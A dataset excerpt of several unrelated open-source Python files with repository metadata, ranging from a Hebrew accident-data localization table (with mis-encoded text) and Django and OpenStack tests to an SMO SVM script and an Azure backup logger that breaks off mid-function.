repo_name (stringlengths 5-100) | path (stringlengths 4-375) | copies (stringclasses, 991 values) | size (stringlengths 4-7) | content (stringlengths 666-1M) | license (stringclasses, 15 values)
---|---|---|---|---|---
yosinv/anyway | localization.py | 2 | 8011 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import csv
import os
import field_names
_tables = {
"SUG_DEREH": {
1: "ืขืืจืื ื ืืฆืืืช",
2: "ืขืืจืื ื ืื ืืฆืืืช",
3: "ืื ืขืืจืื ื ืืฆืืืช",
4: "ืื ืขืืจืื ื ืื ืืฆืืืช",
},
"YEHIDA": {
11: "ืืจืื ืืืฃ (ืืืคื)",
12: "ืืจืื ืืืื",
14: "ืืจืื ืขืืงืื",
20: "ืืจืื ืช\"ื",
33: "ืืจืื ืืืืช",
34: "ืืจืื ืื ืื",
36: "ืืจืื ืฉืืฉืื (ืขื 1999)",
37: "ืืจืื ืฉืืฉืื (ืืื ื-2004)",
38: "ืืจืื ืืืืฉ",
41: "ืืจืื ืฉืืืจืื",
43: "ืืจืื ืืืืื",
51: "ืืจืื ืืฉืจืื",
52: "ืืจืื ืืฉืคืื",
61: "ืืืื ืืจืืฉืืื",
},
"SUG_YOM": {
1: "ืื",
2: "ืขืจื ืื",
3: "ืืื ืืืืขื",
4: "ืืื ืืืจ",
},
"HUMRAT_TEUNA": {
1: "ืงืืื ืืช",
2: "ืงืฉื",
3: "ืงืื",
},
"SUG_TEUNA": {
1: "ืคืืืขื ืืืืื ืจืื",
2: "ืืชื ืืฉืืช ืืืืช ืื ืฆื",
3: "ืืชื ืืฉืืช ืืืืช ืืืืืจ",
4: "ืืชื ืืฉืืช ืฆื ืืฆื",
5: "ืืชื ืืฉืืช ืืืืช ืื ืืืืช",
6: "ืืชื ืืฉืืช ืขื ืจืื ืฉื ืขืฆืจ ืืื ืื ืื",
7: "ืืชื ืืฉืืช ืขื ืจืื ืืื ื",
8: "ืืชื ืืฉืืช ืขื ืขืฆื ืืืื",
9: "ืืจืืื ืืืืืืฉ ืื ืขืืืื ืืืืจืื",
10: "ืืชืืคืืืช",
11: "ืืืืงื",
12: "ืคืืืขื ืื ืืกืข ืืชืื ืืื ืจืื",
13: "ื ืคืืื ืืจืื ื ืข",
14: "ืฉืจืืคื",
15: "ืืืจ",
17: "ืืชื ืืฉืืช ืืืืจ ืื ืืืืช",
18: "ืืชื ืืฉืืช ืืืืจ ืื ืฆื",
19: "ืืชื ืืฉืืช ืขื ืืขื ืืืื",
20: "ืคืืืขื ืืืืขื ืฉื ืจืื",
},
"ZURAT_DEREH": {
1: "ืื ืืกื ืืืืืฃ",
2: "ืืืฆืืื ืืืืืฃ",
3: "ื.ืื ืื/ืช. ืืืง",
4: "ืฉืืคืืข ืชืืื",
5: "ืขืงืื ืื",
6: "ืขื ืืฉืจ ืื ืืจื",
7: "ืืคืืฉ ืืกืืืช ืืจืื",
8: "ืืืืฉ ืืฉืจ/ืฆืืืช",
9: "ืืืจ",
},
"HAD_MASLUL": {
1: "ืื ืกืืืจื",
2: "ืื ืกืืืจื+ืงื ืืคืจืื ืจืฆืืฃ",
3: "ืื ืกืืืจื ืืื ืงื ืืคืจืื ืจืฆืืฃ",
4: "ืืืจ",
},
"RAV_MASLUL": {
1: "ืืืคืจืื ืืกืืื ืช ืืฆืืข",
2: "ืืืคืจืื ืขื ืืืจ ืืืืืืช",
3: "ืืืคืจืื ืื ืืื ืืื ืืืจ ืืืืืืช",
4: "ืืืคืจืื ืื ืื ืืื",
5: "ืืืจ",
},
"MEHIRUT_MUTERET": {
1: "ืขื 50 ืงื\"ืฉ",
2: "60 ืงื\"ืฉ",
3: "70 ืงื\"ืฉ",
4: "80 ืงื\"ืฉ",
5: "90 ืงื\"ืฉ",
6: "100 ืงื\"ืฉ",
},
"TKINUT": {
1: "ืืื ืืืงืื",
2: "ืฉืืืืื ืืจืืขืื",
3: "ืืืืฉ ืืฉืืืฉ",
4: "ืฉืืืืื ืืจืืขืื ืืืืืฉ ืืฉืืืฉ",
},
"ROHAV": {
1: "ืขื 5 ืืืจ",
2: "5 ืขื 7",
3: "7 ืขื 10.5",
4: "10.5 ืขื 14",
5: "ืืืชืจ ื-14",
},
"SIMUN_TIMRUR": {
1: "ืกืืืื ืืงืื/ืืกืจ",
2: "ืชืืืจืืจ ืืงืื/ืืกืจ",
3: "ืืื ืืืงืื",
4: "ืื ื ืืจืฉ ืชืืจืืจ",
},
"TEURA": {
1: "ืืืจ ืืื ืจืืื",
2: "ืจืืืช ืืืืืืช ืขืงื ืืื ืืืืจ (ืขืฉื,ืขืจืคื)",
3: "ืืืื ืคืขืื ืชืืืจื",
4: "ืงืืืืช ืชืืืจื ืืืชื ืชืงืื ื/ืื ืคืืขืืช",
5: "ืืืื ืื ืงืืืืช ืชืืืจื",
},
"BAKARA": {
1: "ืืื ืืงืจื",
2: "ืจืืืืจ ืชืงืื",
3: "ืจืืืืจ ืืืืื ืฆืืื",
4: "ืจืืืืจ ืื ืชืงืื",
5: "ืชืืจืืจ ืขืฆืืจ",
6: "ืชืืจืืจ ืืืืช ืงืืืื",
7: "ืืืจ",
},
"MEZEG_AVIR": {
1: "ืืืืจ",
2: "ืืฉืื",
3: "ืฉืจืื",
4: "ืขืจืคืืื",
5: "ืืืจ",
},
"PNE_KVISH": {
1: "ืืืฉ",
2: "ืจืืื ืืืื",
3: "ืืจืื ืืืืืจ ืืืง",
4: "ืืืืกื ืืืืฅ",
5: "ืืื ืื ืืฆืฅ ืขื ืืืืืฉ",
6: "ืืืจ",
},
"SUG_EZEM": {
1: "ืขืฅ",
2: "ืขืืื ืืฉืื/ืชืืืจื/ืืืคืื",
3: "ืชืืจืืจ ืืฉืื",
4: "ืืฉืจ ืกืืื ืื ืืืืื ืื",
5: "ืืื ื",
6: "ืืืจ ืืืืืืช ืืจืื",
7: "ืืืืช",
8: "ืืืจ",
},
"MERHAK_EZEM": {
1: "ืขื ืืืจ",
2: "1-3 ืืืจ",
3: "ืขื ืืืืืฉ",
4: "ืขื ืฉืื ืืคืจืื",
},
"LO_HAZA": {
1: "ืืื ืืืืืื ืืชื ืืขื",
2: "ืืื ื ืื",
3: "ืฉืืืง ืขื ืืืืืฉ",
4: "ืขืื ืขื ืืืืืฉ",
5: "ืืื ืขื ืื ืืคืจืื",
6: "ืืื ืขื ืฉืืืืื/ืืืจืื",
7: "ืืืจ",
},
"OFEN_HAZIYA": {
1: "ืืชืคืจืฅ ืื ืืืืืฉ",
2: "ืืฆื ืฉืืื ืืืกืชืจ",
3: "ืืฆื ืจืืื",
4: "ืืืจ",
},
"MEKOM_HAZIYA": {
1: "ืื ืืืขืืจ ืืฆืื ืืื ืฆืืืช",
2: "ืื ืืืขืืจ ืืฆืื ืื ืืื ืฆืืืช",
3: "ืืืขืืจ ืืฆืื ืืื ืจืืืืจ",
4: "ืืืขืืจ ืืฆืื ืขื ืจืืืืจ",
},
"KIVUN_HAZIYA": {
1: "ืืืืื ืืฉืืื",
2: "ืืฉืืื ืืืืื",
},
"STATUS_IGUN": {
1: "ืขืืืื ืืืืืง",
2: "ืืจืื ืืฉืื",
3: "ืืจืื ืืจื",
4: "ืืจืื ืงืืืืืืจ",
9: "ืื ืขืืื",
}
}
_fields = {
"pk_teuna_fikt": "ืืืื",
"SUG_DEREH": "ืกืื ืืจื",
"SHEM_ZOMET": "ืฉื ืฆืืืช",
"SEMEL_YISHUV": "ืืฉืื", # from dictionary
"REHOV1": "ืจืืื 1", # from dicstreets (with SEMEL_YISHUV)
"REHOV2": "ืจืืื 2", # from dicstreets (with SEMEL_YISHUV)
"BAYIT": "ืืกืคืจ ืืืช",
"ZOMET_IRONI": "ืฆืืืช ืขืืจืื ื", # from intersect urban dictionary
"KVISH1": "ืืืืฉ 1", # from intersect urban dictionary
"KVISH2": "ืืืืฉ 2", #from intersect urban dictionary
"ZOMET_LO_IRONI": "ืฆืืืช ืื ืขืืจืื ื", #from non urban dictionary
"YEHIDA": "ืืืืื",
"SUG_YOM": "ืกืื ืืื",
"RAMZOR": "ืจืืืืจ",
"HUMRAT_TEUNA": "ืืืืจืช ืชืืื ื",
"SUG_TEUNA": "ืกืื ืชืืื ื",
"ZURAT_DEREH": "ืฆืืจืช ืืจื",
"HAD_MASLUL": "ืื ืืกืืื",
"RAV_MASLUL": "ืจื ืืกืืื",
"MEHIRUT_MUTERET": "ืืืืจืืช ืืืชืจืช",
"TKINUT": "ืชืงืื ืืช",
"ROHAV": "ืจืืื",
"SIMUN_TIMRUR": "ืกืืืื ืชืืจืืจ",
"TEURA": "ืชืืืจื",
"BAKARA": "ืืงืจื",
"MEZEG_AVIR": "ืืื ืืืืืจ",
"MEZEG_AVIR_UNITED": "ืืื ืืืืืจ",
"PNE_KVISH": "ืคื ื ืืืืฉ",
"SUG_EZEM": "ืกืื ืขืฆื",
"MERHAK_EZEM": "ืืจืืง ืขืฆื",
"LO_HAZA": "ืื ืืฆื",
"OFEN_HAZIYA": "ืืืคื ืืฆืื",
"MEKOM_HAZIYA": "ืืงืื ืืฆืื",
"KIVUN_HAZIYA": "ืืืืื ืืฆืื",
"STATUS_IGUN": "ืขืืืื",
"MAHOZ": "ืืืื",
"NAFA": "ื ืคื",
"EZOR_TIVI": "ืืืืจ ืืืขื",
"MAAMAD_MINIZIPALI": "ืืขืื ืืื ืืฆืืคืื",
"ZURAT_ISHUV": "ืฆืืจืช ืืืฉืื"
}
_cities = list(csv.DictReader(open(os.path.join("static/data/cities.csv"))))
_cities_names = {int(x[field_names.sign]): x[field_names.name].decode('cp1255') for x in _cities}
def get_field(field, value=None):
if value:
table = _tables.get(field, None)
return table.get(value, None) if table else None
return _fields.get(field, None)
def get_supported_tables():
return _tables.keys()
def get_city_name(symbol_id):
return _cities_names.get(symbol_id, None)
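# Usage sketch (added comments, not part of the original module; the numeric
# codes below are illustrative only):
#   get_field("SUG_DEREH")       # Hebrew display name of the SUG_DEREH field
#   get_field("SUG_DEREH", 1)    # label mapped to code 1 in _tables["SUG_DEREH"]
#   get_field("SUG_DEREH", 99)   # None, since the code is not in the table
#   get_city_name(70)            # city name for symbol 70, or None if unknown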
| bsd-3-clause |
Kryz/sentry | src/sentry/management/commands/export.py | 23 | 4653 |
from __future__ import absolute_import, print_function
import sys
from django.core import serializers
from django.core.management.base import BaseCommand
from django.db.models import get_apps
def sort_dependencies(app_list):
"""
Similar to Django's except that we discard the importance of natural keys
when sorting dependencies (i.e. it works without them).
"""
from django.db.models import get_model, get_models
# Process the list of models, and get the list of dependencies
model_dependencies = []
models = set()
for app, model_list in app_list:
if model_list is None:
model_list = get_models(app)
for model in model_list:
models.add(model)
# Add any explicitly defined dependencies
if hasattr(model, 'natural_key'):
deps = getattr(model.natural_key, 'dependencies', [])
if deps:
deps = [get_model(*d.split('.')) for d in deps]
else:
deps = []
# Now add a dependency for any FK relation with a model that
# defines a natural key
for field in model._meta.fields:
if hasattr(field.rel, 'to'):
rel_model = field.rel.to
if rel_model != model:
deps.append(rel_model)
# Also add a dependency for any simple M2M relation with a model
# that defines a natural key. M2M relations with explicit through
# models don't count as dependencies.
for field in model._meta.many_to_many:
rel_model = field.rel.to
if rel_model != model:
deps.append(rel_model)
model_dependencies.append((model, deps))
model_dependencies.reverse()
# Now sort the models to ensure that dependencies are met. This
# is done by repeatedly iterating over the input list of models.
# If all the dependencies of a given model are in the final list,
# that model is promoted to the end of the final list. This process
# continues until the input list is empty, or we do a full iteration
# over the input models without promoting a model to the final list.
# If we do a full iteration without a promotion, that means there are
# circular dependencies in the list.
model_list = []
while model_dependencies:
skipped = []
changed = False
while model_dependencies:
model, deps = model_dependencies.pop()
# If all of the models in the dependency list are either already
# on the final model list, or not on the original serialization list,
# then we've found another model with all its dependencies satisfied.
found = True
for candidate in ((d not in models or d in model_list) for d in deps):
if not candidate:
found = False
if found:
model_list.append(model)
changed = True
else:
skipped.append((model, deps))
if not changed:
raise RuntimeError("Can't resolve dependencies for %s in serialized app list." %
', '.join('%s.%s' % (model._meta.app_label, model._meta.object_name)
for model, deps in sorted(skipped, key=lambda obj: obj[0].__name__))
)
model_dependencies = skipped
return model_list
class Command(BaseCommand):
help = 'Exports core metadata for the Sentry installation.'
def yield_objects(self):
app_list = [(a, None) for a in get_apps()]
# Collate the objects to be serialized.
for model in sort_dependencies(app_list):
if not getattr(model, '__core__', True):
sys.stderr.write(">> Skipping model <%s>\n" % (model.__name__,))
continue
if model._meta.proxy:
sys.stderr.write(">> Skipping model <%s>\n" % (model.__name__,))
continue
queryset = model._base_manager.order_by(model._meta.pk.name)
for obj in queryset.iterator():
yield obj
def handle(self, dest=None, **options):
if not dest:
sys.stderr.write('Usage: sentry export [dest]')
sys.exit(1)
if dest == '-':
dest = sys.stdout
else:
dest = open(dest, 'wb')
sys.stderr.write('>> Beginning export\n')
serializers.serialize("json", self.yield_objects(), indent=2, stream=dest,
use_natural_keys=True)
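# Usage note (added for clarity, not part of the original file): per the usage
# string above, the command takes a single destination argument and streams a
# JSON dump of core models either to a file or, with "-", to stdout, e.g.
#   sentry export -
#   sentry export metadata.json   (the file name here is only an example)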
| bsd-3-clause |
rschnapka/commission | sale_commission/partner.py | 3 | 1581 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2011 Pexego Sistemas Informáticos (<http://www.pexego.es>). All Rights Reserved
# $Id$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
"""aรฑadimos algรบn campo relacionado con el intrastat"""
from osv import fields, orm
class res_partner(orm.Model):
"""aรฑadimos algรบn campo relacionado con elas comisiones"""
_name = "res.partner"
_inherit = "res.partner"
_columns = {
'commission_ids': fields.one2many('res.partner.agent', 'partner_id', 'Agents'),
'agent': fields.boolean('Creditor/Agent',
help="If you check this field will be available as creditor or agent.")
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
routeflow/AutomaticConfigurationRouteFlow | POX_CONTROLLER/tests/unit/module_load_test.py | 46 | 1777 |
#!/usr/bin/env python
#
# Copyright 2011-2012 Andreas Wundsam
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" A simple nose based test unit test that discovers all modules in the pox directory and tries to load them """
import sys
from os import path
import os
import unittest
SCRIPT_DIR=path.dirname(path.abspath(__file__))
ROOT=path.abspath(path.join(SCRIPT_DIR,"../.."))
sys.path.append(os.path.dirname(__file__) + "/../..")
packages = {}
modules = []
for root, dirs, files in os.walk(ROOT):
assert root.startswith(ROOT)
root = root[len(ROOT)+1:]
if not root.startswith("pox"): continue
if not path.exists(path.join(root, "__init__.py")):
continue
modules.append(root.replace(path.sep,"."))
files = [f for f in files if f.endswith(".py") and not f.startswith("__init__") and f != "setup.py"]
#print root
for f in files:
packagename = root.replace(path.sep,".")
modules.append( packagename + "." + f[:-3])
def test_load_modules():
# This is a test /generator/. It yields a separate loading test for each module
# Nosetests is required
for module in modules:
yield load_module, module
def load_module(module):
loaded_module = __import__(module)
if __name__ == '__main__':
import nose
nose.main(defaultTest=__name__)
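# Usage note (added for clarity, not part of the original file):
# test_load_modules() is a nose test generator, so this file is meant to be
# collected by nose, e.g. from the repository root:
#   nosetests POX_CONTROLLER/tests/unit/module_load_test.py
# or executed directly, which hands control to nose.main() via the block above.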
| apache-2.0 |
joker946/nova | nova/tests/unit/api/openstack/test_api_version_request.py | 48 | 4954 |
# Copyright 2014 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.api.openstack import api_version_request
from nova import exception
from nova import test
class APIVersionRequestTests(test.NoDBTestCase):
def test_valid_version_strings(self):
def _test_string(version, exp_major, exp_minor):
v = api_version_request.APIVersionRequest(version)
self.assertEqual(v.ver_major, exp_major)
self.assertEqual(v.ver_minor, exp_minor)
_test_string("1.1", 1, 1)
_test_string("2.10", 2, 10)
_test_string("5.234", 5, 234)
_test_string("12.5", 12, 5)
_test_string("2.0", 2, 0)
_test_string("2.200", 2, 200)
def test_null_version(self):
v = api_version_request.APIVersionRequest()
self.assertTrue(v.is_null())
def test_invalid_version_strings(self):
self.assertRaises(exception.InvalidAPIVersionString,
api_version_request.APIVersionRequest, "2")
self.assertRaises(exception.InvalidAPIVersionString,
api_version_request.APIVersionRequest, "200")
self.assertRaises(exception.InvalidAPIVersionString,
api_version_request.APIVersionRequest, "2.1.4")
self.assertRaises(exception.InvalidAPIVersionString,
api_version_request.APIVersionRequest, "200.23.66.3")
self.assertRaises(exception.InvalidAPIVersionString,
api_version_request.APIVersionRequest, "5 .3")
self.assertRaises(exception.InvalidAPIVersionString,
api_version_request.APIVersionRequest, "5. 3")
self.assertRaises(exception.InvalidAPIVersionString,
api_version_request.APIVersionRequest, "5.03")
self.assertRaises(exception.InvalidAPIVersionString,
api_version_request.APIVersionRequest, "02.1")
self.assertRaises(exception.InvalidAPIVersionString,
api_version_request.APIVersionRequest, "2.001")
self.assertRaises(exception.InvalidAPIVersionString,
api_version_request.APIVersionRequest, "")
self.assertRaises(exception.InvalidAPIVersionString,
api_version_request.APIVersionRequest, " 2.1")
self.assertRaises(exception.InvalidAPIVersionString,
api_version_request.APIVersionRequest, "2.1 ")
def test_version_comparisons(self):
v1 = api_version_request.APIVersionRequest("2.0")
v2 = api_version_request.APIVersionRequest("2.5")
v3 = api_version_request.APIVersionRequest("5.23")
v4 = api_version_request.APIVersionRequest("2.0")
v_null = api_version_request.APIVersionRequest()
self.assertTrue(v1 < v2)
self.assertTrue(v3 > v2)
self.assertTrue(v1 != v2)
self.assertTrue(v1 == v4)
self.assertTrue(v1 != v_null)
self.assertTrue(v_null == v_null)
self.assertRaises(TypeError, v1.__cmp__, "2.1")
def test_version_matches(self):
v1 = api_version_request.APIVersionRequest("2.0")
v2 = api_version_request.APIVersionRequest("2.5")
v3 = api_version_request.APIVersionRequest("2.45")
v4 = api_version_request.APIVersionRequest("3.3")
v5 = api_version_request.APIVersionRequest("3.23")
v6 = api_version_request.APIVersionRequest("2.0")
v7 = api_version_request.APIVersionRequest("3.3")
v8 = api_version_request.APIVersionRequest("4.0")
v_null = api_version_request.APIVersionRequest()
self.assertTrue(v2.matches(v1, v3))
self.assertTrue(v2.matches(v1, v_null))
self.assertTrue(v1.matches(v6, v2))
self.assertTrue(v4.matches(v2, v7))
self.assertTrue(v4.matches(v_null, v7))
self.assertTrue(v4.matches(v_null, v8))
self.assertFalse(v1.matches(v2, v3))
self.assertFalse(v5.matches(v2, v4))
self.assertFalse(v2.matches(v3, v1))
self.assertRaises(ValueError, v_null.matches, v1, v3)
def test_get_string(self):
v1_string = "3.23"
v1 = api_version_request.APIVersionRequest(v1_string)
self.assertEqual(v1_string, v1.get_string())
self.assertRaises(ValueError,
api_version_request.APIVersionRequest().get_string)
| apache-2.0 |
webnotes/wnframework | webnotes/widgets/page.py | 34 | 1572 |
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import webnotes
import webnotes.model.doc
import webnotes.model.code
@webnotes.whitelist()
def get(name):
"""
Return the :term:`doclist` of the `Page` specified by `name`
"""
page = webnotes.bean("Page", name)
page.run_method("get_from_files")
return page.doclist
@webnotes.whitelist(allow_guest=True)
def getpage():
"""
Load the page from `webnotes.form` and send it via `webnotes.response`
"""
page = webnotes.form_dict.get('name')
doclist = get(page)
if has_permission(doclist):
# load translations
if webnotes.lang != "en":
from webnotes.modules import get_doc_path
from webnotes.translate import get_lang_data
d = doclist[0]
messages = get_lang_data(get_doc_path(d.module, d.doctype, d.name),
webnotes.lang, 'js')
webnotes.response["__messages"] = messages
webnotes.response['docs'] = doclist
else:
webnotes.response['403'] = 1
raise webnotes.PermissionError, 'No read permission for Page %s' % \
(doclist[0].title or page, )
def has_permission(page_doclist):
if webnotes.user.name == "Administrator" or "System Manager" in webnotes.user.get_roles():
return True
page_roles = [d.role for d in page_doclist if d.fields.get("doctype")=="Page Role"]
if webnotes.user.name == "Guest" and not (page_roles and "Guest" in page_roles):
return False
elif page_roles and not (set(page_roles) & set(webnotes.user.get_roles())):
return False
return True
| mit |
mattrobenolt/django | tests/model_formsets/test_uuid.py | 45 | 1295 |
from django.forms.models import inlineformset_factory
from django.test import TestCase
from .models import UUIDPKChild, UUIDPKParent
class InlineFormsetTests(TestCase):
def test_inlineformset_factory_nulls_default_pks(self):
"""
#24377 - If we're adding a new object, a parent's auto-generated pk
from the model field default should be ignored as it's regenerated on
the save request.
"""
FormSet = inlineformset_factory(UUIDPKParent, UUIDPKChild, fields='__all__')
formset = FormSet()
self.assertIsNone(formset.forms[0].fields['parent'].initial)
def test_inlineformset_factory_ignores_default_pks_on_submit(self):
"""
#24377 - Inlines with a model field default should ignore that default
value to avoid triggering validation on empty forms.
"""
FormSet = inlineformset_factory(UUIDPKParent, UUIDPKChild, fields='__all__')
formset = FormSet({
'uuidpkchild_set-TOTAL_FORMS': 3,
'uuidpkchild_set-INITIAL_FORMS': 0,
'uuidpkchild_set-MAX_NUM_FORMS': '',
'uuidpkchild_set-0-name': 'Foo',
'uuidpkchild_set-1-name': '',
'uuidpkchild_set-2-name': '',
})
self.assertTrue(formset.is_valid())
| bsd-3-clause |
shipEZ/flaskApp | lib/python2.7/site-packages/pip/_vendor/requests/packages/chardet/chardetect.py | 1786 | 2504 |
#!/usr/bin/env python
"""
Script which takes one or more file paths and reports on their detected
encodings
Example::
% chardetect somefile someotherfile
somefile: windows-1252 with confidence 0.5
someotherfile: ascii with confidence 1.0
If no paths are provided, it takes its input from stdin.
"""
from __future__ import absolute_import, print_function, unicode_literals
import argparse
import sys
from io import open
from chardet import __version__
from chardet.universaldetector import UniversalDetector
def description_of(lines, name='stdin'):
"""
Return a string describing the probable encoding of a file or
list of strings.
:param lines: The lines to get the encoding of.
:type lines: Iterable of bytes
:param name: Name of file or collection of lines
:type name: str
"""
u = UniversalDetector()
for line in lines:
u.feed(line)
u.close()
result = u.result
if result['encoding']:
return '{0}: {1} with confidence {2}'.format(name, result['encoding'],
result['confidence'])
else:
return '{0}: no result'.format(name)
def main(argv=None):
'''
Handles command line arguments and gets things started.
:param argv: List of arguments, as if specified on the command-line.
If None, ``sys.argv[1:]`` is used instead.
:type argv: list of str
'''
# Get command line arguments
parser = argparse.ArgumentParser(
description="Takes one or more file paths and reports their detected \
encodings",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
conflict_handler='resolve')
parser.add_argument('input',
help='File whose encoding we would like to determine.',
type=argparse.FileType('rb'), nargs='*',
default=[sys.stdin])
parser.add_argument('--version', action='version',
version='%(prog)s {0}'.format(__version__))
args = parser.parse_args(argv)
for f in args.input:
if f.isatty():
print("You are running chardetect interactively. Press " +
"CTRL-D twice at the start of a blank line to signal the " +
"end of your input. If you want help, run chardetect " +
"--help\n", file=sys.stderr)
print(description_of(f, f.name))
if __name__ == '__main__':
main()
| mit |
tshi04/machine-learning-codes | SVM-SMO/smo_svm2.py | 1 | 4990 |
'''
Created on Mar 10, 2017
@author: Tian Shi
'''
import numpy as np
import matplotlib.pyplot as plt
np.random.seed(10)
class SMOSVM(object):
'''
SMO SVM
'''
def __init__(self, data, C=10.0, max_iter=1000, err=1e-8):
'''
Constructor
'''
self.data = data
self.C = C
self.max_iter = max_iter
self.err = err
self.n_point = len(data)
self.n_dim = len(data[0])-1
self.init()
def init(self):
self.X = np.zeros([self.n_point,self.n_dim])
self.y = np.zeros(self.n_point)
for kk in range(self.n_point):
for jj in range(self.n_dim):
self.X[kk,jj] = self.data[kk][jj]
self.y[kk] = self.data[kk][self.n_dim]
self.alpha = np.zeros(self.n_point)
self.w = np.dot(self.alpha*self.y, self.X)
self.b = 0.0
def iterater(self):
print '-------------------------------'
itit = 0
while itit < self.max_iter:
print itit,
cnt = 0
for j in range(self.n_point):
E_j = self.cal_E(self.X[j], self.y[j])
if (self.y[j]*E_j < -self.err and self.alpha[j] < self.C) or (self.y[j]*E_j > self.err and self.alpha[j] > 0.0):
i = np.random.randint(self.n_point)
if i == j:
continue
E_i = self.cal_E(self.X[i], self.y[i])
alpha_old_j = self.alpha[j]
alpha_old_i = self.alpha[i]
LB, HB = self.cal_LB_HB(self.y[i], self.y[j], self.alpha[i], self.alpha[j])
if LB == HB:
continue
eta = 2.0*self.X[i].dot(self.X[j]) - self.X[i].dot(self.X[i]) - self.X[j].dot(self.X[j])
if eta >= 0:
continue
self.alpha[i] = self.alpha[i] - (self.y[i])*(E_j-E_i)/eta
self.alpha[i] = np.minimum(self.alpha[i], HB)
self.alpha[i] = np.maximum(self.alpha[i], LB)
if np.abs(self.alpha[i]-alpha_old_i) <= 1e-5:
continue
self.alpha[j] = self.alpha[j] + self.y[i]*self.y[j]*(alpha_old_i-self.alpha[i])
b1 = 0
l1 = 0
if self.alpha[i] < self.C and self.alpha[i] > 0:
l1 = 1
b1 = self.b - E_i - self.y[j]*(self.alpha[j]-alpha_old_j)*self.X[j].dot(self.X[i]) - self.y[i]*(self.alpha[i]-alpha_old_i)*self.X[j].dot(self.X[j])
b2 = 0
l2 = 0
if self.alpha[j] < self.C and self.alpha[j] > 0:
l2 = 1
b2 = self.b - E_j - self.y[j]*(self.alpha[j]-alpha_old_j)*self.X[j].dot(self.X[j]) - self.y[i]*(self.alpha[i]-alpha_old_i)*self.X[i].dot(self.X[j])
if l1 == 1 and l2 == 1:
self.b = 0.5*(b1+b2)
else:
if l1 == 1:
self.b = b1
if l2 == 1:
self.b = b2
cnt += 1
if cnt == 0:
itit += 1
else:
itit = 0
print self.alpha
def cal_w(self):
self.w = np.dot(self.alpha*self.y, self.X)
def get_para(self):
return self.w, self.b
def get_X(self):
return self.X
def cal_E(self, x_j, y_j):
return np.dot(self.alpha*self.y,self.X.dot(x_j)) + self.b - y_j
def cal_LB_HB(self, y_i, y_j, alpha_old_i, alpha_old_j):
LB = 0
HB = 0
if y_i != y_j:
LB = np.maximum(0, alpha_old_i - alpha_old_j)
HB = np.minimum(self.C, self.C + alpha_old_i - alpha_old_j)
else:
LB = np.maximum(0, alpha_old_i + alpha_old_j - self.C)
HB = np.minimum(self.C, alpha_old_i + alpha_old_j)
return LB, HB
if __name__ == '__main__':
arr = [[1,1,1],[2,2,1],[2,0,1],[2,1,1],[0,0,-1],[1,0,-1],[0,1,-1],[-1,-1,-1]]
myproj = SMOSVM(arr, C=10.0, max_iter=1000)
myproj.iterater()
myproj.cal_w()
w,b = myproj.get_para()
print w, b
x = np.linspace(-1.0, 2.0, 10)  # the number of samples must be an integer on newer NumPy releases
y = -w[0]/w[1]*x - b/w[1]
plt.plot(x,y)
plt.scatter(1,1,color='g')
plt.scatter(2,2,color='g')
plt.scatter(2,0,color='g')
plt.scatter(2,1,color='g')
plt.scatter(0,0,color='r')
plt.scatter(1,0,color='r')
plt.scatter(0,1,color='r')
plt.scatter(-1,-1,color='r')
plt.xlabel('x')
plt.ylabel('y')
plt.show()
print 'Normal Terminate'
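# Algorithm recap (comments added for clarity, not part of the original file).
# iterater() follows the simplified SMO scheme with a linear kernel: for a
# multiplier alpha[j] that violates the KKT conditions, a second index i is
# chosen at random and the pair is optimised jointly while keeping
# sum_n(alpha[n]*y[n]) fixed:
#   eta      = 2*x_i.x_j - x_i.x_i - x_j.x_j      (negative for distinct points)
#   alpha[i] = alpha[i] - y[i]*(E_j - E_i)/eta, clipped to the box [LB, HB]
#   alpha[j] = alpha[j] + y[i]*y[j]*(alpha_old_i - alpha[i])
# The bias b is re-estimated from whichever updated multiplier lies strictly
# inside (0, C), averaging the two candidates when both do, and the weight
# vector is recovered afterwards as w = sum_n alpha[n]*y[n]*X[n] in cal_w().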
| gpl-3.0 |
boumenot/azure-linux-extensions | VMBackup/main/backuplogger.py | 2 | 3155 |
#!/usr/bin/env python
#
# VM Backup extension
#
# Copyright 2014 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.7+
#
import datetime
import httplib
import os
import string
import time
import traceback
import urlparse
from blobwriter import BlobWriter
from Utils.WAAgentUtil import waagent
class Backuplogger(object):
def __init__(self, hutil):
self.msg = ''
self.con_path = '/dev/console'
self.hutil = hutil
"""description of class"""
def log(self, msg, local=False, level='Info'):
log_msg = "{0} {1} {2} \n".format(str(datetime.datetime.now()) , level , msg)
self.log_to_con(log_msg)
if(local):
self.hutil.log(log_msg)
else:
self.msg += log_msg
def log_to_con(self, msg):
try:
